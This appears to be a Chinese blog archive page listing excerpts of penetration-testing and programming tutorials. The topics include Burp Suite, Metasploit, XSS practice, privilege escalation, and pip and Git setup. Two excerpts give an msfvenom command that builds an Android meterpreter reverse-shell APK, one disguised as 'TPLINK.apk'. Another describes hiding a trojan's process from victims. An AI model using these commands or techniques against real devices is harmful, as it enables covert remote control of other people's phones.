03 2020 档案
摘要:如果点击start attrack 后出现 Payload set 1: Invalid number settings 的提示,先点hex 后点 decimal 再开始start attrack,这是一个软件bug,需要手动让它刷新。 转载:https://blog.csdn.net/fjh199
阅读全文
摘要:目前Python的两个版本Python2和Python3同时存在,且这两个版本同时在更新与维护。 到底是选择Python2还是选择Python3,取决于当前要使用的库、框架支持哪个版本。 例如:HTMLTestRunner、locustio支持Python2,但是不支持Python3。 所以很多时候
阅读全文
摘要:在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木
阅读全文
摘要:WebCrack简介 WebCrack是一款开源免费的web后台弱口令/万能密码批量爆破、检测工具。 不仅支持如discuz,织梦,phpmyadmin等主流CMS的后台爆破,并且对于绝大多数小众CMS甚至个人开发网站后台都有效果,只需在工具中导入后台地址即可进行自动化检测。 使用方法 下载GitH
阅读全文
摘要:转载:https://www.cnblogs.com/bmjoker/p/9446472.html 如遇到不弹窗等问题,可以更换浏览器,或者重新进入。 XSS挑战之旅 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php
阅读全文
摘要:什么是社会工程学 社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,
阅读全文
摘要:最近下载了VS2019,然后安装的时候也安装了python的环境,但是用pip命令想下载第三方库时显示 查了一下,是因为没有把pip的路径加到环境变量里,所以就想着加就加咯,然后就发现我不知道路径在哪(因为以前是直接装python的,自动添加环境变量的)。想了一下,应该是在VS路径下,就去找了一下,
阅读全文
摘要:python -m pip是什么? 首先,python -m pip会使用您指定为python的Python解释器来执行pip。因此,/usr/bin/python3.7 -m pip表示您正在执行位于/usr/bin/python3.7的解释器的pip。如果您不熟悉这个标志以及它是如何工作的,您可
阅读全文
摘要:临时使用:通用windows和linux可以在使用pip的时候在后面加上-i参数,指定pip源eg: pip install scrapy -i https://pypi.tuna.tsinghua.edu.cn/simple 永久修改:Linux:修改 /root/.pip/pip.conf (没
阅读全文
摘要:普通版 在kali中我们可以利用msfvenom来生成一个Android木马。命令如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk 这样便生成了一个名为TPL
阅读全文
摘要:一:sniper【狙击手】 这种攻击基于原始的请求内容,需要一个字典,每次用字典里的一个值去代替一个待攻击的原始值。 攻击次数=参数个数X字典内元素个数 例如:原始请求中 name=aa , password=bb, 字典: { 1 ,2 }; 那么会产生四个请求: name=1 , passwor
阅读全文
摘要:网站基本信息收集 网站域名、子域名收集 域名解析ip查询 网站所有人(whois) 负责人联系方式 网站基于那个CMS搭建 1x01 网站域名子域名收集 这里,我们以本站一级域名bbskali.cn为例,简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。利用dnsmap查询子
阅读全文
摘要:BurpSuite 是我心中最强大的Web渗透工具,没有之一!它也是日常中用得最多的工具,它有一些强大的插件可以帮忙我们减少大量的工作量以及更好地挖掘漏洞,今天分享下我常用的一些 burp 插件。 Autorize —— 强大的越权自动化测试工具 如果你在测试越权的时候,还是手动把URL复制到另一个
阅读全文
摘要:创建文件夹步骤:1.mkdir +desktop(路径)/ index(文件夹名) 在桌面创建了一个index文件夹 mkdir +123456 +desktop(路径)/ index.txt(文件夹名) 在桌面创建了一个index.txt文件夹,但需要权限 123456 才能访问 2.rm -(选
阅读全文
摘要:Kali源: 修改vi /etc/apt/sources.list #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali
阅读全文
摘要:学会使用快捷键 Ctrl + C:这个是用来终止当前命令的快捷键,当然你也可以输入一大串字符,不想让它运行直接 Ctrl + C,光标就会跳入下一行。Tab: 这个键是最有用的键了,也是笔者敲击概率最高的一个键。因为当你打一个命令打一半时,它会帮你补全的。不光是命令,当你打一个目录时,同样可以补全,
阅读全文
摘要:wscan v2.4 wscan——一个基于协程的轻量级Web目录扫描器 写来平时用来打CTF,探测敏感信息和目录结构的,主要目的还是要优雅 、快捷一点 :) 适用于CTF这类网站页面不多,需要敏感文件、目录结构探测的网站扫描 安装 $ python3 -m pip install wscan 特性
阅读全文
摘要:这个是第一次在使用Git进行项目代码提交的最后一步操作的时候,出现了一个问题:用户名或密码不正确(访问令牌) 出现这种现象是因为之push代码的时候windows弹出一个用户名密码输入框,用户名输出了的缘故。这里的用户名其实就是你的gitee账号。 解决办法是: 打开电脑的控制面板–>用户账户–>管
阅读全文
摘要:一. 首先,我暂时不知道 如何直接从本地上传,所以提供的是一种笨方法,首先建立一个空仓库。 二. 在码云上面下载一个空仓库 三. 进入到相关目录,也就是存放项目的目录,打开该路径的cmd, 将复制好的网址 打入命令行。 四. 将你要的 项目内容复到这个 仓库下,也就是这个文件夹下。 我是将以下内容复
阅读全文
摘要:在安装Git的过程中勾选了Git Gui Here、Git Bash Here选项,实际过程中,我们使用Git是会安装TortoiseGit(乌龟git)的,桌面右击显示乌龟git就已经可以满足需求了,并不需要桌面右击中有Git Gui Here、Git Bash Here选项,右键菜单长长的一堆并
阅读全文
摘要:通过该实验了解支付逻辑漏洞,掌握常见的支付漏洞原理以及漏洞检测利用和漏洞防护。 预备知识 随着网民越来越习惯于网上购物,出现了越来越多的电商网站,在线交易平台等。其中肯定要涉及在线支付的流程,而这里面也有很多购物支付的逻辑。由于这里涉及到金钱,如果网站逻辑设计不当,很有可能造成低价或者0元购买商品等
阅读全文
摘要:1、root@xuegod53:~# apt update注:apt update 的作用是从/etc/apt/sources.list 文件中定义的源中获取的最新的软件包列表。即运行 apt update 并没有更新软件,而是相当于 windows 下面的检查更新,获取的是软件的状态。root@x
阅读全文
摘要:漏洞描述: 这个漏洞属于未正确处理窗口类成员对象导致的Double-free类型本地权限提升漏洞 复现环境: 1、Windows 7 sp1 64位操作系统2、CVE-2018-8639-EXP 漏洞利用: 首先下载CVE-2018-8639.exe https://github.com/timwh
阅读全文
摘要:在github中下下来 网址:https://github.com/maurosoria/dirsearch 下载下来 我是用的kail 所以我把它也放在kail里面了 dirsearch需要python3,kail中是自带的 进入dirsearch目录后 执行./dirsearch.py -u 1
阅读全文
摘要:这次来说说一个关于由PDF文件的栈溢出而引发的远程任意代码执行的典型老版漏洞。这枚漏洞是在2010年被发布出来,距今已快10年之久,但是漏洞却很简单粗暴,有着打开PDF文件就立马中招的效果。 说起这枚漏洞,就要来掰扯掰扯“漏洞界”的两大“泰山北斗”了。Microsoft的Office套件和Adobe
阅读全文
摘要:目录 创建一个.c文件 写完代码以后进行编译 @(用linux编译并运行c文件) 创建一个.c文件 vi 文件名.c 对于图形化的linux,需要右键桌面,在终端中打开,输入vi 文件名.c就创建了一个.c文件,并且在vim模式下进行编辑。如果用不惯vim也可以在创建了.c文件之后直接双击打开在ge
阅读全文
摘要:1. 命令:sl (蒸汽机车)你可能了解 ‘ls’ 命令,并经常使用它来查看文件夹的内容。但是,有些时候你可能会拼写成 ‘sl’ ,这时我们应该如何获得一些乐趣而不是看见“command not found”呢?安装 sl 输出当你敲入的是‘LS‘而不是’ls‘时,这个命令也会运行。 2. 命令:t
阅读全文
摘要:经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面渗透主机呢?...... 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 什么是内网?内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:1
阅读全文
摘要:行动开始先查看kali的ip,我的是1.114 然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改 显示这个说明已经生成成功了
阅读全文
